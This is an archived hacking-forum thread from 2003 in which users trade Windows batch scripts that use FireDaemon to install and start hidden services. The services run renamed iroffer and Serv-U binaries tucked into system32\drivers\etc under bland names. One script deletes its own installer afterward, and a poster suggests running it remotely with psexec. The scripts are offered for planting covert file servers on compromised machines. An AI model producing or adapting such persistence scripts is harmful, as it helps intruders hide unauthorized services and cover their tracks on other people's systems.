hacking contest

hacking exploits security forum
hacking
compliance articles
upgrade backup exec
information security consultant

Full Version: Firedaemon .bat
Tool
Hi i'm looking for a .bat file that can put the firedaemon commands automatically ie:

set mxbin=C:\WINNT\system32\drivers\etc\
set mxhome=C:\WINNT\system32\drivers\etc\

FireDaemon.exe -i Bah1 "C:\WINNT\system32\drivers\etc" "C:\WINNT\system32\drivers\etc\bah1.exe" "" Y 0 0 Y Y

net start Bah1

set mxbin=C:\WINNT\system32\drivers\etc\
set mxhome=C:\WINNT\system32\drivers\etc\

FireDaemon.exe -i iroffer "C:\WINNT\system32\drivers\etc" "C:\WINNT\system32\drivers\etc\bah.exe" "C:\WINNT\system32\drivers\etc\xasdb.config" Y 0 0 Y Y

net start bah

of course the filenames are different but can always edit... can anyone do one up ? thanks
virus
QUOTE (Tool @ Aug 10 2003, 12:05 PM)
Hi i'm looking for a .bat file that can put the firedaemon commands automatically ....

just put what u have in a file with the .bat extension. Most probably it'll work .... make sure u have dos commands ONLY in the .bat file

DJohn84
CODE
set MXHOME=c:\windows\system32
set MXBin=c:\windows\system32
firedaemon -i Service1 "C:\windows\system32\drivers\etc" "C:\windows\system32\drivers\etc\service1.exe" "C:\windows\system32\drivers\etc\service1configfile" Y 0 0 N Y

firedaemon -i Service2 "C:\windows\system32\drivers\etc" "C:\windows\system32\drivers\etc\service2.exe" "" Y 0 0 N Y

net start Service1
net start Service2
del install.bat
wh173r
Right there is my batch file that I normally use for say iroffer and Serv-U.
So, in order to use FireDaemon to install and start services FireDaemon must be
in the same folder as the batch file. Start the batch file remotely with psexec.

[CODE]
@echo off
SET MXHOME=c:\winnt\system32\drivers\etc\logs
SET MXBIN=c:\winnt\system32\drivers\etc\logs

c:\winnt\system32\drivers\etc\logs\firedaemon -i winio "c:\winnt\system32\drivers\etc\logs" "c:\winnt\system32\drivers\etc\logs\io.exe" "io.ini" Y 0 0 0 Y
c:\winnt\system32\drivers\etc\logs\firedaemon -i winsu "c:\winnt\system32\drivers\etc\logs" "c:\winnt\system32\drivers\etc\logs\su.exe" "su.ini" Y 0 0 0 Y

net start winio
net start winsu
    This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please click here.

     
    Invision Power Board © 2001-2005 Invision Power Services, Inc.